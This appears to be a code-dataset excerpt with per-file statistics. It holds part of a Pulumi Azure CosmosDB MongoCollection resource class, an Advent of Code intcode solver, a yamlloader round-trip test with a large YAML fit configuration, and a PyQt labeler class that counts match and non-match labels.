                unique=True,
            )])
        ```
        ## Import
        CosmosDB Mongo Collection can be imported using the `resource id`, e.g.
        ```sh
         $ pulumi import azure:cosmosdb/mongoCollection:MongoCollection collection1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.DocumentDB/databaseAccounts/account1/mongodbDatabases/db1/collections/collection1
        ```
        :param str resource_name: The name of the resource.
        :param MongoCollectionArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads above: either an args
        # bundle (MongoCollectionArgs) or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(MongoCollectionArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       account_name: Optional[pulumi.Input[str]] = None,
                       analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
                       autoscale_settings: Optional[pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']]] = None,
                       database_name: Optional[pulumi.Input[str]] = None,
                       default_ttl_seconds: Optional[pulumi.Input[int]] = None,
                       indices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       shard_key: Optional[pulumi.Input[str]] = None,
                       throughput: Optional[pulumi.Input[int]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads: normalizes
        # options, validates required properties and registers the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to looking up an existing one).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = MongoCollectionArgs.__new__(MongoCollectionArgs)
            # account_name, database_name and resource_group_name are required
            # unless the resource is being looked up by URN.
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
            __props__.__dict__["autoscale_settings"] = autoscale_settings
            if database_name is None and not opts.urn:
                raise TypeError("Missing required property 'database_name'")
            __props__.__dict__["database_name"] = database_name
            __props__.__dict__["default_ttl_seconds"] = default_ttl_seconds
            __props__.__dict__["indices"] = indices
            __props__.__dict__["name"] = name
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["shard_key"] = shard_key
            __props__.__dict__["throughput"] = throughput
            # system_indexes is output-only; it always starts unset.
            __props__.__dict__["system_indexes"] = None
        super(MongoCollection, __self__).__init__(
            'azure:cosmosdb/mongoCollection:MongoCollection',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            account_name: Optional[pulumi.Input[str]] = None,
            analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
            autoscale_settings: Optional[pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']]] = None,
            database_name: Optional[pulumi.Input[str]] = None,
            default_ttl_seconds: Optional[pulumi.Input[int]] = None,
            indices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]]] = None,
            name: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            shard_key: Optional[pulumi.Input[str]] = None,
            system_indexes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionSystemIndexArgs']]]]] = None,
            throughput: Optional[pulumi.Input[int]] = None) -> 'MongoCollection':
        """
        Get an existing MongoCollection resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
        :param pulumi.Input[pulumi.InputType['MongoCollectionAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
        :param pulumi.Input[str] database_name: The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        :param pulumi.Input[int] default_ttl_seconds: The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionIndexArgs']]]] indices: One or more `index` blocks as defined below.
        :param pulumi.Input[str] name: Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] shard_key: The name of the key to partition on for sharding. There must not be any other unique index keys.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MongoCollectionSystemIndexArgs']]]] system_indexes: One or more `system_indexes` blocks as defined below.
        :param pulumi.Input[int] throughput: The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
        """
        # Attach the provider id to the options, then build a state bag with
        # whatever qualifying properties the caller supplied.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _MongoCollectionState.__new__(_MongoCollectionState)
        __props__.__dict__["account_name"] = account_name
        __props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
        __props__.__dict__["autoscale_settings"] = autoscale_settings
        __props__.__dict__["database_name"] = database_name
        __props__.__dict__["default_ttl_seconds"] = default_ttl_seconds
        __props__.__dict__["indices"] = indices
        __props__.__dict__["name"] = name
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["shard_key"] = shard_key
        __props__.__dict__["system_indexes"] = system_indexes
        __props__.__dict__["throughput"] = throughput
        return MongoCollection(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Output[str]:
        """Return the `account_name` output value."""
        return pulumi.get(self, "account_name")
    @property
    @pulumi.getter(name="analyticalStorageTtl")
    def analytical_storage_ttl(self) -> pulumi.Output[Optional[int]]:
        """
        The default time to live of Analytical Storage for this Mongo Collection. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
        """
        return pulumi.get(self, "analytical_storage_ttl")
    @property
    @pulumi.getter(name="autoscaleSettings")
    def autoscale_settings(self) -> pulumi.Output[Optional['outputs.MongoCollectionAutoscaleSettings']]:
        """
        An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create. Requires `shard_key` to be set.
        """
        return pulumi.get(self, "autoscale_settings")
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Output[str]:
        """
        The name of the Cosmos DB Mongo Database in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @property
    @pulumi.getter(name="defaultTtlSeconds")
    def default_ttl_seconds(self) -> pulumi.Output[Optional[int]]:
        """
        The default Time To Live in seconds. If the value is `-1` or `0`, items are not automatically expired.
        """
        return pulumi.get(self, "default_ttl_seconds")
    @property
    @pulumi.getter
    def indices(self) -> pulumi.Output[Optional[Sequence['outputs.MongoCollectionIndex']]]:
        """
        One or more `index` blocks as defined below.
        """
        return pulumi.get(self, "indices")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the name of the Cosmos DB Mongo Collection. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the resource group in which the Cosmos DB Mongo Collection is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")
    @property
    @pulumi.getter(name="shardKey")
    def shard_key(self) -> pulumi.Output[Optional[str]]:
        """
        The name of the key to partition on for sharding. There must not be any other unique index keys.
        """
        return pulumi.get(self, "shard_key")
    @property
    @pulumi.getter(name="systemIndexes")
    def system_indexes(self) -> pulumi.Output[Sequence['outputs.MongoCollectionSystemIndex']]:
        """
        One or more `system_indexes` blocks as defined below.
        """
        return pulumi.get(self, "system_indexes")
    @property
    @pulumi.getter
    def throughput(self) -> pulumi.Output[int]:
        """
        The throughput of the MongoDB collection (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon database creation otherwise it cannot be updated without a manual destroy/create.
        """
        return pulumi.get(self, "throughput")
| 54.680916
| 346
| 0.685113
| 4,425
| 35,816
| 5.363616
| 0.057853
| 0.071838
| 0.068046
| 0.03337
| 0.913879
| 0.901154
| 0.894287
| 0.87697
| 0.864667
| 0.855482
| 0
| 0.005386
| 0.22247
| 35,816
| 654
| 347
| 54.764526
| 0.846632
| 0.415624
| 0
| 0.764228
| 1
| 0
| 0.142363
| 0.053069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162602
| false
| 0.00271
| 0.01897
| 0.00813
| 0.279133
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
46597ed04492dd815f62cc568dcf91dc16c19591
| 1,453
|
py
|
Python
|
adventofcode/day2.py
|
Imipenem/Competitive_Prog_with_Python
|
64f64c733b591acd8f75a36efbb66cca3b58f05f
|
[
"MIT"
] | null | null | null |
adventofcode/day2.py
|
Imipenem/Competitive_Prog_with_Python
|
64f64c733b591acd8f75a36efbb66cca3b58f05f
|
[
"MIT"
] | null | null | null |
adventofcode/day2.py
|
Imipenem/Competitive_Prog_with_Python
|
64f64c733b591acd8f75a36efbb66cca3b58f05f
|
[
"MIT"
] | null | null | null |
def opcodeI() -> int:
with open("/home/thelichking/Desktop/adventOfCode/Day2/Opcodes",'r' ) as file:
lines = list(map(int,file.readline().replace("\n","").split(",")))
lines[1],lines[2] = 1,0
idx = 0
while idx < len(lines):
cur_opcode = lines[idx]
if cur_opcode == 99: return lines[0]
else:
if cur_opcode == 1: lines[lines[idx+3]] = lines[lines[idx+1]] + lines[lines[idx+2]]
elif cur_opcode == 2: lines[lines[idx+3]] = lines[lines[idx+1]] * lines[lines[idx+2]]
idx += 4
return lines[0]
def opcodeII(noun, verb) -> int:
with open("/home/thelichking/Desktop/adventOfCode/Day2/Opcodes",'r' ) as file:
lines = list(map(int,file.readline().replace("\n","").split(",")))
lines[1],lines[2] = noun,verb
idx = 0
while idx < len(lines):
cur_opcode = lines[idx]
if cur_opcode == 99: return lines[0]
else:
if cur_opcode == 1: lines[lines[idx+3]] = lines[lines[idx+1]] + lines[lines[idx+2]]
elif cur_opcode == 2: lines[lines[idx+3]] = lines[lines[idx+1]] * lines[lines[idx+2]]
idx += 4
return lines[0]
def inputII() -> int:
    """Brute-force the noun/verb pair (each 0..99) producing 19690720.

    Returns 100 * noun + verb for the first matching pair; falls through
    (implicitly returning None) when no pair matches.
    """
    for verb in range(100):
        for noun in range(100):
            if opcodeII(noun, verb) == 19690720:
                return 100 * noun + verb
if __name__=="__main__":
    # Script entry point: print the part II answer (100 * noun + verb).
    print(inputII())
| 32.288889
| 101
| 0.52512
| 197
| 1,453
| 3.791878
| 0.253807
| 0.149933
| 0.208835
| 0.11245
| 0.829987
| 0.829987
| 0.829987
| 0.829987
| 0.829987
| 0.829987
| 0
| 0.052579
| 0.306263
| 1,453
| 45
| 102
| 32.288889
| 0.688492
| 0
| 0
| 0.666667
| 0
| 0
| 0.081155
| 0.070151
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.181818
| 0.030303
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
466d800ff51a829401b626e9b95173a227d0c8d5
| 71,023
|
py
|
Python
|
tests/test_ext_anatools.py
|
andy-maier/yamlloader
|
13c8d42f63c97309ee1b5a7ac1e7f216c10e1b1c
|
[
"MIT"
] | 9
|
2018-01-18T15:27:11.000Z
|
2020-12-18T04:46:49.000Z
|
tests/test_ext_anatools.py
|
andy-maier/yamlloader
|
13c8d42f63c97309ee1b5a7ac1e7f216c10e1b1c
|
[
"MIT"
] | 12
|
2018-02-08T10:10:53.000Z
|
2022-03-29T22:07:45.000Z
|
tests/test_ext_anatools.py
|
andy-maier/yamlloader
|
13c8d42f63c97309ee1b5a7ac1e7f216c10e1b1c
|
[
"MIT"
] | 2
|
2019-06-22T09:05:50.000Z
|
2021-07-12T18:34:18.000Z
|
from collections import OrderedDict
from unittest import TestCase
import yaml
import yamlloader
config1 = """name: sim1_all_result
model:
categories:
- Mode
pdf:
rare:
sig:
yield: VAR 10000 0 1000000
brem0:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: cb
mass_limits:
low: 5000
high: 6000.0
parameters:
mu: VAR 5279 5250 5300
sigma: VAR 14.53 2 100
alpha: VAR 1.097 0.001 4
n: VAR 1.73 0.00001 150
brem1:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
mu: VAR 5279 5250 5300
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0 1
brem2:
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
shift1: '@shift1/shift1/shift1/VAR 1. 0.5 1.5'
mu_fixed: '@muTrue/muTrue/muTrue/CONST 5279'
mu: SHIFT @muTrue @shift1
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0.3 0.7
comb_bkg:
yield: VAR 4000 0 10000
mass:
observable-names:
mass: B_M
pdf: exponential
mass_limits:
low: 5000
high: 6000
parameters:
tau: VAR -0.0008 -0.1 -0.0001
part_bkg:
yield: VAR 40000 10000 1000000
mass:
observable-names:
mass: B_M
pdf: gaussian
mass_limits:
low: 5000
high: 5400
parameters:
mu: VAR 5100 5001 5100
sigma: VAR 10 0 10000
jpsi:
sig:
yield: VAR 10000 0 1000000
brem0:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: cb
mass_limits:
low: 5000
high: 6000.0
parameters:
mu: VAR 5279 5250 5300
sigma: VAR 14.53 2 100
alpha: VAR 1.097 0.001 4
n: VAR 1.73 0.00001 150
brem1:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
mu: VAR 5279 5250 5300
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0 1
brem2:
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
mu: SHIFT @muTrue @shift1
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0.3 0.7
comb_bkg:
yield: VAR 4000 0 10000
mass:
observable-names:
mass: B_M
pdf: exponential
mass_limits:
low: 5000
high: 6000
parameters:
tau: VAR -0.0008 -0.1 -0.0001
part_bkg:
yield: VAR 40000 10000 1000000
mass:
observable-names:
mass: B_M
pdf: gaussian
mass_limits:
low: 5000
high: 5400
parameters:
mu: VAR 5100 5001 5100
sigma: VAR 10 0 10000
"""
config1_target = OrderedDict(
[
("name", "sim1_all_result"),
(
"model",
OrderedDict(
[
("categories", ["Mode"]),
(
"pdf",
OrderedDict(
[
(
"rare",
OrderedDict(
[
(
"sig",
OrderedDict(
[
(
"yield",
"VAR 10000 " "0 1000000",
),
(
"brem0",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"cb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000.0,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma",
"VAR 14.53 2 100",
),
(
"alpha",
"VAR 1.097 0.001 4",
),
(
"n",
"VAR 1.73 0.00001 150",
),
]
),
),
]
),
),
]
),
),
(
"brem1",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0 1",
),
]
),
),
]
),
),
]
),
),
(
"brem2",
OrderedDict(
[
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"shift1",
"@shift1/shift1/shift1/VAR 1. 0.5 1.5",
),
(
"mu_fixed",
"@muTrue/muTrue/muTrue/CONST 5279",
),
(
"mu",
"SHIFT @muTrue @shift1",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0.3 0.7",
),
]
),
),
]
),
)
]
),
),
]
),
),
(
"comb_bkg",
OrderedDict(
[
(
"yield",
"VAR 4000 " "0 10000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"exponential",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"tau",
"VAR -0.0008 -0.1 -0.0001",
)
]
),
),
]
),
),
]
),
),
(
"part_bkg",
OrderedDict(
[
(
"yield",
"VAR 40000 "
"10000 "
"1000000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
("pdf", "gaussian"),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
5400,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5100 5001 5100",
),
(
"sigma",
"VAR 10 0 10000",
),
]
),
),
]
),
),
]
),
),
]
),
),
(
"jpsi",
OrderedDict(
[
(
"sig",
OrderedDict(
[
(
"yield",
"VAR 10000 " "0 1000000",
),
(
"brem0",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"cb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000.0,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma",
"VAR 14.53 2 100",
),
(
"alpha",
"VAR 1.097 0.001 4",
),
(
"n",
"VAR 1.73 0.00001 150",
),
]
),
),
]
),
),
]
),
),
(
"brem1",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0 1",
),
]
),
),
]
),
),
]
),
),
(
"brem2",
OrderedDict(
[
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"SHIFT @muTrue @shift1",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0.3 0.7",
),
]
),
),
]
),
)
]
),
),
]
),
),
(
"comb_bkg",
OrderedDict(
[
(
"yield",
"VAR 4000 " "0 10000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"exponential",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"tau",
"VAR -0.0008 -0.1 -0.0001",
)
]
),
),
]
),
),
]
),
),
(
"part_bkg",
OrderedDict(
[
(
"yield",
"VAR 40000 "
"10000 "
"1000000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
("pdf", "gaussian"),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
5400,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5100 5001 5100",
),
(
"sigma",
"VAR 10 0 10000",
),
]
),
),
]
),
),
]
),
),
]
),
),
]
),
),
]
),
),
]
)
# Pairs of (expected YAML dump text, OrderedDict to round-trip) consumed by
# the TestLoaderDumper tests below.
text_target_odict = [(config1, config1_target)]
class TestLoaderDumper(TestCase):
    """Round-trip tests: dump an OrderedDict to YAML text and load it back."""
    def set_LoadersDumpers(self, loader, dumper):
        """Remember the Loader/Dumper classes used by subsequent round-trips."""
        self.loader = loader
        self.dumper = dumper
    def test_ordereddict(self):
        """Round-trip every (text, odict) fixture with the ordereddict C classes."""
        self.set_LoadersDumpers(
            yamlloader.ordereddict.CLoader, dumper=yamlloader.ordereddict.CDumper
        )
        for expected_text, target_dict in text_target_odict:
            self.loaddump(dict_to_save=target_dict, dump_target=expected_text)
    def loaddump(self, dict_to_save, dump_target=None, loader=None, dumper=None):
        """Dump dict_to_save; optionally compare the text, then load and compare."""
        loader = self.loader if loader is None else loader
        dumper = self.dumper if dumper is None else dumper
        dumped_text = yaml.dump(dict_to_save, Dumper=dumper, default_flow_style=False)
        if dump_target:
            self.assertEqual(dumped_text, dump_target)
        reloaded = yaml.load(dumped_text, Loader=loader)
        self.assertEqual(dict_to_save, reloaded)
| 72.398573
| 135
| 0.071836
| 1,273
| 71,023
| 3.940299
| 0.095051
| 0.033493
| 0.023923
| 0.035885
| 0.839314
| 0.830542
| 0.830542
| 0.830542
| 0.830542
| 0.830542
| 0
| 0.183726
| 0.90068
| 71,023
| 980
| 136
| 72.472449
| 0.52736
| 0
| 0
| 0.664264
| 0
| 0
| 0.090027
| 0.001492
| 0
| 0
| 0
| 0
| 0.00206
| 1
| 0.00309
| false
| 0
| 0.004119
| 0
| 0.008239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
467015cba285e8f561874cdccaad2e1b0f0badf2
| 3,434
|
py
|
Python
|
py_labeler/labeler/controller/StatsController.py
|
anhaidgroup/magellan_labeler
|
97583163091cd04a8bfd3824d78291da58f24f9c
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 5
|
2019-03-13T11:49:35.000Z
|
2021-11-17T01:37:36.000Z
|
py_labeler/labeler/controller/StatsController.py
|
anhaidgroup/magellan_labeler
|
97583163091cd04a8bfd3824d78291da58f24f9c
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 5
|
2017-12-31T19:00:37.000Z
|
2020-01-29T18:56:47.000Z
|
py_labeler/labeler/controller/StatsController.py
|
anhaidgroup/magellan_labeler
|
97583163091cd04a8bfd3824d78291da58f24f9c
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 4
|
2017-12-30T17:23:07.000Z
|
2020-02-25T20:49:35.000Z
|
try:
from PyQt5.QtCore import QObject
except ImportError:
raise ImportError('PyQt5 is not installed. Please install PyQt5 to use '
'GUI related functions in py_labeler.')
from py_labeler.utils import ApplicationContext
class StatsController(QObject):
"""
Computes statistics to be displayed
"""
    def __init__(self, main_page):
        """Store the main page this controller computes statistics for."""
        super(StatsController, self).__init__(None)
        self.main_page = main_page
def count_matched_tuple_pairs(self, data_frame, label_column_name):
""" Returns a count of tuple pairs whose label value is MATCH.
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == MATCH (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.MATCH].shape[0]
def count_non_matched_tuple_pairs(self, data_frame, label_column_name):
"""Returns a count of tuple pairs whose label value is NON-MATCH
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == NON MATCH (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.NON_MATCH].shape[0]
def count_not_labeled_tuple_pairs(self, data_frame, label_column_name):
"""Returns a count of tuple pairs whose label value is NOT_LABELED
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == NOT LABELED (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.NOT_LABELED].shape[0]
def count_not_sure_tuple_pairs(self, data_frame, label_column_name):
"""Returns a count of tuple pairs whose label value is NOT_SURE
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == NOT SURE (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.NOT_SURE].shape[0]
| 39.471264
| 113
| 0.670938
| 454
| 3,434
| 4.852423
| 0.162996
| 0.179755
| 0.136178
| 0.072628
| 0.82887
| 0.802542
| 0.802542
| 0.802542
| 0.802542
| 0.802542
| 0
| 0.002774
| 0.265288
| 3,434
| 86
| 114
| 39.930233
| 0.870392
| 0.372452
| 0
| 0.307692
| 0
| 0
| 0.142318
| 0
| 0
| 0
| 0
| 0.046512
| 0
| 1
| 0.192308
| false
| 0
| 0.153846
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
